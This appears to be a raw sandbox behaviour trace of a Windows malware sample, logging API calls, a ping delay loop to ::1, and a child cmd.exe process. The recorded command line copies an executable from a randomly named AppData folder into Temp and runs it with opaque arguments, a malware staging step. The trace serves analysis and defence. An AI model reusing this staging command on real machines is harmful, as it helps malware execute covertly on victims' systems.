[0109.739] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.739] LocalFree (hMem=0x1f3c10) returned 0x0 [0109.739] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer=" \x8f\x1f") returned 0x2 [0109.739] CharToOemBuffA 
(in: lpszSrc="\r\n", lpszDst=0x1f8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0109.739] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.739] _write (in: _FileHandle=1, _Buf=0x1f8f20*, _MaxCharCount=0x2 | out: _Buf=0x1f8f20*) returned 2 [0109.739] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.739] LocalFree (hMem=0x1f8f20) returned 0x0 [0109.739] Sleep (dwMilliseconds=0x3e8) [0110.769] Icmp6SendEcho2 (in: IcmpHandle=0x1f8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x18f920, DestinationAddress=0xbf55e0, RequestData=0x1f4830, RequestSize=0x20, RequestOptions=0x18f8d0, ReplyBuffer=0x1febb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1febb0) returned 0x1 [0110.831] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x18fda4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0110.832] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x18f8a8, nSize=0x0, Arguments=0x18f8a4 | out: lpBuffer=" Q\x1f") returned 0x10 [0110.832] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1f5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0110.832] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.832] _write (in: _FileHandle=1, _Buf=0x1f5120*, _MaxCharCount=0x10 | out: _Buf=0x1f5120*) returned 16 [0110.832] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.832] LocalFree (hMem=0x1f5120) returned 0x0 [0110.832] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer="\x10<\x1f") returned 0x9 [0110.832] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x1f3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 
[0110.832] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.832] _write (in: _FileHandle=1, _Buf=0x1f3c10*, _MaxCharCount=0x9 | out: _Buf=0x1f3c10*) returned 9 [0110.832] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.832] LocalFree (hMem=0x1f3c10) returned 0x0 [0110.832] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer=" \x8f\x1f") returned 0x2 [0110.833] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x1f8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0110.833] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.833] _write (in: _FileHandle=1, _Buf=0x1f8f20*, _MaxCharCount=0x2 | out: _Buf=0x1f8f20*) returned 2 [0110.833] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.833] LocalFree (hMem=0x1f8f20) returned 0x0 [0110.833] Sleep (dwMilliseconds=0x3e8) [0111.903] Icmp6SendEcho2 (in: IcmpHandle=0x1f8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x18f920, DestinationAddress=0xbf55e0, RequestData=0x1f4830, RequestSize=0x20, RequestOptions=0x18f8d0, ReplyBuffer=0x1febb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1febb0) returned 0x1 [0112.051] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x18fda4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0112.051] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x18f8a8, nSize=0x0, Arguments=0x18f8a4 | out: lpBuffer=" Q\x1f") returned 0x10 [0112.051] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1f5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0112.051] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.051] _write (in: _FileHandle=1, 
_Buf=0x1f5120*, _MaxCharCount=0x10 | out: _Buf=0x1f5120*) returned 16 [0112.051] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.051] LocalFree (hMem=0x1f5120) returned 0x0 [0112.051] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer="\x10<\x1f") returned 0x9 [0112.051] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x1f3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0112.051] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.051] _write (in: _FileHandle=1, _Buf=0x1f3c10*, _MaxCharCount=0x9 | out: _Buf=0x1f3c10*) returned 9 [0112.051] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.051] LocalFree (hMem=0x1f3c10) returned 0x0 [0112.051] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer=" \x8f\x1f") returned 0x2 [0112.051] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x1f8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0112.052] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.052] _write (in: _FileHandle=1, _Buf=0x1f8f20*, _MaxCharCount=0x2 | out: _Buf=0x1f8f20*) returned 2 [0112.052] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.052] LocalFree (hMem=0x1f8f20) returned 0x0 [0112.052] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x18f870, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0112.052] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x18f840, nSize=0x0, Arguments=0x18f83c | out: lpBuffer="\xd0\x14\x20") returned 0x56 [0112.052] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, 
Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x2014d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0112.052] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.052] _write (in: _FileHandle=1, _Buf=0x2014d0*, _MaxCharCount=0x56 | out: _Buf=0x2014d0*) returned 86 [0112.052] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.052] LocalFree (hMem=0x2014d0) returned 0x0 [0112.052] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x18f850, nSize=0x0, Arguments=0x18f84c | out: lpBuffer="\xe8\x14\x20") returned 0x61 [0112.052] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x2014e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0112.052] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.052] _write (in: _FileHandle=1, _Buf=0x2014e8*, _MaxCharCount=0x61 | out: _Buf=0x2014e8*) returned 97 [0112.052] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.052] LocalFree (hMem=0x2014e8) returned 0x0 [0112.052] IcmpCloseHandle (IcmpHandle=0x1f8b40) returned 1 [0112.251] LocalFree (hMem=0x1f4830) returned 0x0 [0112.251] LocalFree (hMem=0x1febb0) returned 0x0 [0112.251] WSACleanup () returned 0 [0112.339] exit (_Code=0) Thread: id = 64 os_tid = 0xd20 Thread: id = 65 os_tid = 0xd24 Thread: id = 66 os_tid = 0xd28 Process: id = "39" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6689 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6690 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6691 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6692 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6693 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 6694 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6695 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6696 start_va = 
0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6697 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 6698 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 6699 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6700 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6701 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6702 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 6703 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 6704 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 6705 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6706 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 6707 start_va = 0x76910000 end_va = 0x769e3fff 
entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6708 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6709 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6710 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 6711 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6712 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 6713 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 6714 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6715 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6716 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 
6717 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 6718 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 6719 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 6720 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 6721 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 6722 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 6733 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 67 os_tid = 0xd30 [0111.295] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f8a4 | out: lpSystemTimeAsFileTime=0x26f8a4*(dwLowDateTime=0x805761c0, dwHighDateTime=0x1d440a9)) [0111.295] GetCurrentProcessId () returned 0xd2c [0111.295] GetCurrentThreadId () returned 0xd30 [0111.295] GetTickCount () returned 0x26a56 [0111.295] QueryPerformanceCounter (in: lpPerformanceCount=0x26f89c | out: lpPerformanceCount=0x26f89c*=16808387378) returned 1 [0111.295] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0111.295] __set_app_type (_Type=0x1) [0111.295] __p__fmode () returned 0x76b331f4 [0111.295] __p__commode () returned 0x76b331fc [0111.295] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0111.296] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, 
_DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0111.296] GetCurrentThreadId () returned 0xd30 [0111.296] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd30) returned 0x38 [0111.296] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0111.296] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0111.296] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.296] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.296] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f834 | out: phkResult=0x26f834*=0x0) returned 0x2 [0111.296] VirtualQuery (in: lpAddress=0x26f86b, lpBuffer=0x26f804, dwLength=0x1c | out: lpBuffer=0x26f804*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.296] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f804, dwLength=0x1c | out: lpBuffer=0x26f804*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0111.296] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f804, dwLength=0x1c | out: lpBuffer=0x26f804*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0111.296] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f804, dwLength=0x1c | out: lpBuffer=0x26f804*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.296] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f804, dwLength=0x1c | out: lpBuffer=0x26f804*(BaseAddress=0x270000, AllocationBase=0x270000, 
AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0111.296] GetConsoleOutputCP () returned 0x1b5 [0111.296] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.297] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0111.297] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.297] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0111.297] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.297] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.297] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.297] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.297] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.297] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.297] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.297] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0111.297] GetEnvironmentStringsW () returned 0x3e0388* [0111.298] FreeEnvironmentStringsW (penv=0x3e0388) returned 1 [0111.298] GetEnvironmentStringsW () returned 0x3e0388* [0111.298] FreeEnvironmentStringsW (penv=0x3e0388) returned 1 [0111.298] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7a4 | out: phkResult=0x26e7a4*=0x40) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x38, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x1, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x1, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x0, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x40, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x40, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x40, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegCloseKey (hKey=0x40) returned 0x0 [0111.298] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7a4 | out: phkResult=0x26e7a4*=0x40) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x40, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x1, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7ac, 
lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x1, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x0, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x9, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x9, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x9, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegCloseKey (hKey=0x40) returned 0x0 [0111.299] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886358 [0111.299] srand (_Seed=0x5b886358) [0111.299] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0111.299] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" 
[0111.299] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.299] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1ae8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0111.299] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0111.299] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.299] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.299] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0111.299] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0111.299] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0111.299] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0111.299] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0111.299] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0111.299] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0111.299] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") 